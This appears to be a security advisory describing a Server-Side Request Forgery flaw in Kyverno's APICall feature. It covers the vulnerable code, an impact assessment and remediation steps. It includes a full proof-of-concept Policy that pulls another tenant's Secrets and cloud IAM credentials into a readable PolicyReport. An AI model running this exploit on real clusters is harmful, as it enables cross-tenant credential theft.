+ "details": "### Summary\n\nKyverno's APICall feature contains a Server-Side Request Forgery (SSRF) vulnerability that allows users with Policy creation permissions to access arbitrary internal resources through Kyverno's high-privilege ServiceAccount. In multi-tenant Kubernetes environments, this constitutes a classic Confused Deputy problem: low-privilege tenants can steal sensitive data from other tenants (such as database passwords and API keys) and cloud platform IAM credentials, completely breaking tenant isolation. This vulnerability does not require cluster-admin privileges and can be exploited with only namespace-level Policy creation permissions.\n\n### Details\n\n#### Vulnerability Mechanism\n\nKyverno's APICall feature allows Policies to fetch external data via HTTP requests. This feature does not validate target URLs when executing HTTP requests, leading to an SSRF vulnerability.\n\n**Source Point - User-Controlled URL**\n\nFile: `api/kyverno/v1/common_types.go`, lines 247-250\n\n```go\ntype ServiceCall struct {\n // URL is the JSON web service URL\n URL string `json:\"url\"` // User-controlled, no validation\n Headers []HTTPHeader `json:\"headers,omitempty\"`\n CABundle string `json:\"caBundle,omitempty\"`\n}\n```\n\nThe URL field is completely controlled by users through Policy configuration, with no validation mechanism to restrict target addresses.\n\n**Sink Point - HTTP Request Execution**\n\nFile: `pkg/engine/apicall/executor.go`, lines 65-110\n\n```go\nfunc (a *executor) executeServiceCall(ctx context.Context, apiCall *kyvernov1.APICall) ([]byte, error) {\n if apiCall.Service == nil {\n return nil, fmt.Errorf(\"missing service for APICall %s\", [a.name](http://a.name/))\n }\n\n client, err := a.buildHTTPClient(apiCall.Service)\n if err != nil {\n return nil, err\n }\n\n req, err := a.buildHTTPRequest(ctx, apiCall)\n if err != nil {\n return nil, fmt.Errorf(\"failed to build HTTP request for APICall %s: %w\", [a.name](http://a.name/), err)\n 
}\n\n // Line 80: Directly executes HTTP request without URL validation\n resp, err := client.Do(req)\n if err != nil {\n return nil, fmt.Errorf(\"failed to execute HTTP request for APICall %s: %w\", [a.name](http://a.name/), err)\n }\n defer resp.Body.Close()\n\n // Read and return response content\n body, err := io.ReadAll(resp.Body)\n if err != nil {\n // ...\n }\n\n return body, nil\n}\n```\n\nLine 80's `client.Do(req)` directly executes the HTTP request without checking if the target URL is an internal IP address (like 169.254.169.254) or resources belonging to other tenants.\n\n**Confused Deputy Problem**\n\nIn multi-tenant environments, Kyverno uses a cluster-wide high-privilege ServiceAccount to execute all APICall requests. When a low-privilege tenant creates a Policy containing malicious APICall directives, Kyverno executes these requests with its own high privileges, leading to privilege escalation.\n\nAttack path:\n```\nTenant A (namespace-level permissions)\n → Creates malicious Policy\n → Kyverno (cluster-wide high privileges)\n → Accesses Tenant B's Secrets / Cloud metadata service\n → Sensitive data leaked to PolicyReport\n → Tenant A reads PolicyReport to obtain data\n```\n\n### PoC\n\n#### Environment Setup\n\n**Prerequisites**\n- Kubernetes cluster \n- Kyverno v1.16.0 installed\n- Mock cloud metadata service (optional, for testing cloud credential theft)\n\n**Step 1: Install Kyverno**\n\n```bash\nkubectl create namespace kyverno\nkubectl create -f https://github.com/kyverno/kyverno/releases/download/v1.16.0/install.yaml\nkubectl wait --for=condition=Ready pods --all -n kyverno --timeout=300s\n```\n\nVerify installation:\n```bash\n$ kubectl get pods -n kyverno\nNAME READY STATUS RESTARTS AGE\nkyverno-admission-controller-5c84845f5-28hz5 1/1 Running 0 2m\nkyverno-background-controller-59b7b8d686-7pqxl 1/1 Running 0 2m\nkyverno-cleanup-controller-5fd988d64f-nsgdb 1/1 Running 0 2m\nkyverno-reports-controller-546cb78fbc-2dd74 1/1 Running 0 
2m\n```\n\n**Step 2: Deploy Mock Metadata Service**\n\nCreate file `metadata-mock.yaml`:\n\n```yaml\napiVersion: v1\nkind: Namespace\nmetadata:\n name: metadata-mock\n---\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: metadata-mock\n namespace: metadata-mock\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: metadata-mock\n template:\n metadata:\n labels:\n app: metadata-mock\n spec:\n containers:\n - name: mock-server\n image: python:3.9-slim\n command: [\"python\", \"-c\"]\n args:\n - |\n import http.server\n import socketserver\n import json\n\n class Handler(http.server.SimpleHTTPRequestHandler):\n def do_GET(self):\n if 'iam/security-credentials/test-role' in self.path:\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n creds = {\n \"AccessKeyId\": \"AKIAIOSFODNN7EXAMPLE\",\n \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n \"Token\": \"SimulatedSessionToken123456\",\n \"Expiration\": \"2025-12-31T23:59:59Z\"\n }\n self.wfile.write(json.dumps(creds).encode())\n else:\n self.send_response(404)\n self.end_headers()\n\n with socketserver.TCPServer((\"\", 80), Handler) as httpd:\n httpd.serve_forever()\n ports:\n - containerPort: 80\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: metadata-mock\n namespace: metadata-mock\nspec:\n selector:\n app: metadata-mock\n ports:\n - port: 80\n targetPort: 80\n```\n\nDeploy:\n```bash\nkubectl apply -f metadata-mock.yaml\nkubectl wait --for=condition=Ready pods --all -n metadata-mock --timeout=120s\n```\n\n**Step 3: Create Multi-Tenant Environment**\n\nCreate two tenant namespaces:\n```bash\nkubectl create namespace tenant-a\nkubectl create namespace tenant-b\n```\n\nCreate sensitive data in tenant-b:\n```bash\nkubectl create secret generic db-credentials -n tenant-b \\\n --from-literal=username=admin \\\n --from-literal=password=SuperSecret123! 
\\n --from-literal=database=production-db\n```\n\nCreate restricted ServiceAccount for tenant-a:\n```bash\nkubectl create serviceaccount tenant-a-admin -n tenant-a\n```\n\nCreate file `tenant-a-rbac.yaml`:\n```yaml\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n  name: policy-creator\n  namespace: tenant-a\nrules:\n- apiGroups: [\"kyverno.io\"]\n  resources: [\"policies\"]\n  verbs: [\"create\", \"get\", \"list\", \"update\", \"patch\", \"delete\"]\n- apiGroups: [\"\"]\n  resources: [\"configmaps\"]\n  verbs: [\"create\", \"get\", \"list\"]\n- apiGroups: [\"wgpolicyk8s.io\"]\n  resources: [\"policyreports\"]\n  verbs: [\"get\", \"list\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n  name: tenant-a-policy-creator\n  namespace: tenant-a\nroleRef:\n  apiGroup: rbac.authorization.k8s.io\n  kind: Role\n  name: policy-creator\nsubjects:\n- kind: ServiceAccount\n  name: tenant-a-admin\n  namespace: tenant-a\n```\n\nApply configuration:\n```bash\nkubectl apply -f tenant-a-rbac.yaml\n```\n\n**Step 4: Verify Permission Isolation**\n\nCreate test Pod:\n```bash\nkubectl run tenant-a-test -n tenant-a \\\n --image=bitnami/kubectl:latest \\\n --serviceaccount=tenant-a-admin \\\n --command -- sleep 3600\n```\n\nVerify tenant-a cannot directly access tenant-b:\n```bash\n$ kubectl exec -n tenant-a tenant-a-test -- kubectl get secrets -n tenant-b\nError from server (Forbidden): secrets is forbidden: User \"system:serviceaccount:tenant-a:tenant-a-admin\" cannot list resource \"secrets\" in API group \"\" in the namespace \"tenant-b\"\n```\n\nThis confirms that tenant-a's ServiceAccount cannot directly access tenant-b's resources.\n\n#### Exploitation\n\n**Step 1: Create Malicious Policy**\n\nCreate file `confused-deputy-attack.yaml`:\n\n```yaml\napiVersion: kyverno.io/v1\n
kind: Policy\nmetadata:\n  name: confused-deputy-attack\n  namespace: tenant-a\nspec:\n  background: true\n  validationFailureAction: Audit\n  rules:\n  - name: steal-tenant-b-secrets\n    match:\n      any:\n      - resources:\n          kinds:\n          - ConfigMap\n    context:\n    - name: tenantBSecrets\n      apiCall:\n        method: GET\n        urlPath: \"/api/v1/namespaces/tenant-b/secrets/db-credentials\"\n    validate:\n      message: \"STOLEN TENANT-B SECRETS - Username: {{ tenantBSecrets.data.username | base64_decode(@) }}, Password: {{ tenantBSecrets.data.password | base64_decode(@) }}, Database: {{ tenantBSecrets.data.database | base64_decode(@) }}\"\n      pattern:\n        metadata:\n          labels:\n            force-fail: \"true\"\n  - name: steal-cloud-credentials\n    match:\n      any:\n      - resources:\n          kinds:\n          - ConfigMap\n    context:\n    - name: cloudCreds\n      apiCall:\n        method: GET\n        service:\n          url: \"http://metadata-mock.metadata-mock.svc.cluster.local/latest/meta-data/iam/security-credentials/test-role\"\n    validate:\n      message: \"STOLEN CLOUD CREDENTIALS - AccessKeyId: {{ cloudCreds.AccessKeyId }}, SecretAccessKey: {{ cloudCreds.SecretAccessKey }}\"\n      pattern:\n        metadata:\n          labels:\n            force-fail-cloud: \"true\"\n```\n\nApply Policy:\n```bash\n$ kubectl apply -f confused-deputy-attack.yaml\npolicy.kyverno.io/confused-deputy-attack created\n```\n\n**Step 2: Trigger Policy Execution**\n\nCreate ConfigMap to trigger Policy:\n```bash\n$ kubectl create configmap attack-trigger -n tenant-a --from-literal=trigger=now\nconfigmap/attack-trigger created\n```\n\n**Step 3: View Stolen Data**\n\nAfter a few seconds, check PolicyReport:\n```bash\n$ kubectl get policyreport -n tenant-a -o yaml | grep -A 5 \"STOLEN\"\n```\n\nActual output:\n```yaml\n- message: 'validation error: STOLEN TENANT-B SECRETS - Username: admin, Password:\n
    SuperSecret123!, Database: production-db. rule steal-tenant-b-secrets failed\n    at path /metadata/labels/'\n  policy: tenant-a/confused-deputy-attack\n  result: fail\n  rule: steal-tenant-b-secrets\n--\n- message: 'validation error: STOLEN CLOUD CREDENTIALS - AccessKeyId: AKIAIOSFODNN7EXAMPLE,\n    SecretAccessKey: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY. rule steal-cloud-credentials\n    failed at path /metadata/labels/'\n  policy: tenant-a/confused-deputy-attack\n  result: fail\n  rule: steal-cloud-credentials\n```\n\nThe attack succeeded. Through Kyverno, tenant-a has stolen:\n1. Tenant-b's database credentials (username: admin, password: SuperSecret123!, database: production-db)\n2. Cloud platform IAM credentials (AccessKeyId and SecretAccessKey)\n\n**Step 4: Verify Kyverno Logs**\n\nCheck Kyverno admission controller logs:\n```bash\n$ kubectl logs -n kyverno deployment/kyverno-admission-controller --tail=100 | grep -i \"apicall\"\n2026-01-06T14:40:34Z INFO DefaultContextLoaderFactory apicall/apiCall.go:151 executed service APICall {\"name\": \"cloudCredentials\", \"len\": 180}\n```\n\nThe log shows the APICall executed successfully and returned 180 bytes of data (exactly the length of the mock credentials JSON).\n\n### Impact\n\nThis is a critical security vulnerability with particularly severe impact in multi-tenant Kubernetes environments.\n\n**Affected Environments**\n- All multi-tenant Kubernetes clusters using Kyverno\n- Environments granting users namespace-level Policy creation permissions\n- Clusters running on cloud platforms (AWS EKS, GCP GKE, Azure AKS)\n\n**Vulnerability Impact**\n\n1. Complete Multi-Tenant Isolation Breach\n   - Tenants can read other tenants' Secrets (database passwords, API keys, etc.)\n   - Tenants can access other tenants' ConfigMaps and other resources\n   - Completely violates the security assumptions of multi-tenant environments\n\n2. Cloud Platform Credential Leakage\n
   - Can access the cloud metadata service (169.254.169.254)\n   - Obtain node IAM role credentials\n   - Use these credentials to access cloud platform resources (S3, RDS, GCS, etc.)\n\n3. Lateral Movement\n   - Extend from Kubernetes cluster permissions to cloud platform resource access\n   - Potentially access other tenants' cloud resources\n   - Further penetration in cloud environments\n\n4. Confused Deputy Problem\n   - Low-privilege users leverage a high-privilege proxy (Kyverno) to execute privileged operations\n   - Bypasses RBAC permission controls\n   - Makes it difficult to trace the actual attacker through audit logs\n\n**Severity Assessment**\n\n- CVSS 3.1 Score: 8.5 (High)\n- CWE Classification: CWE-918 (Server-Side Request Forgery)\n\nIn multi-tenant environments, the severity of this vulnerability is much higher than in single-tenant environments because exploitation does not require cluster-admin privileges, only namespace-level Policy creation permissions.\n\n**Real-World Scenario Risks**\n\nScenario 1: SaaS Multi-Tenant Platform\n- Each customer has one namespace\n- Customer A can steal Customer B's database passwords and API keys\n- Leads to data breaches, compliance violations, and loss of customer trust\n\nScenario 2: Enterprise Internal Multi-Team Shared Cluster\n- Different business teams share one Kubernetes cluster\n- Team A can steal Team B's production database credentials\n- Leads to internal data breaches and production incidents\n\nScenario 3: Cloud Platform Managed Kubernetes\n- Running on AWS EKS, GCP GKE, or Azure AKS\n- Tenants can obtain node IAM role credentials\n- Access cloud platform resources and move laterally into the cloud environment\n\n**Remediation Recommendations**\n\nImmediate measures:\n1. Disable the APICall feature in multi-tenant environments\n2. Restrict Policy creation permissions to cluster-admin only\n3. Use NetworkPolicy to restrict Kyverno Pod egress traffic\n\nLong-term fixes:\n1. Add URL validation in the `executeServiceCall` function to block internal IP addresses\n2. Use a separate low-privilege ServiceAccount for APICall requests\n3. Implement a URL whitelist mechanism\n4. Audit and monitor all APICall requests",
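As an illustration of long-term fix 1, the pre-flight check could look like the following minimal Go sketch. This is not Kyverno's actual code: `validateAPICallURL` is a hypothetical helper, and it blocks only the obvious ranges (loopback, link-local space including 169.254.169.254, and RFC 1918 private addresses).

```go
package main

import (
	"fmt"
	"net"
	"net/url"
)

// validateAPICallURL is a hypothetical pre-flight check: resolve the host in
// the user-supplied URL and reject any address that is loopback, link-local
// (which covers the 169.254.169.254 cloud metadata endpoint), or RFC 1918
// private space. Call it before client.Do(req).
func validateAPICallURL(rawURL string) error {
	u, err := url.Parse(rawURL)
	if err != nil {
		return fmt.Errorf("invalid URL: %w", err)
	}
	// LookupIP handles both DNS names and literal IP addresses.
	ips, err := net.LookupIP(u.Hostname())
	if err != nil {
		return fmt.Errorf("cannot resolve host %q: %w", u.Hostname(), err)
	}
	for _, ip := range ips {
		if ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsPrivate() {
			return fmt.Errorf("APICall to internal address %s is blocked", ip)
		}
	}
	return nil
}

func main() {
	// Both of these should be rejected: link-local metadata IP and a
	// private in-cluster address.
	fmt.Println(validateAPICallURL("http://169.254.169.254/latest/meta-data/"))
	fmt.Println(validateAPICallURL("http://10.0.0.1/secrets"))
}
```

Note the check-then-use gap: the hostname is resolved again when the request is actually sent, so a production fix would also need to pin the validated IP in the HTTP transport's dial function to prevent DNS rebinding between validation and request.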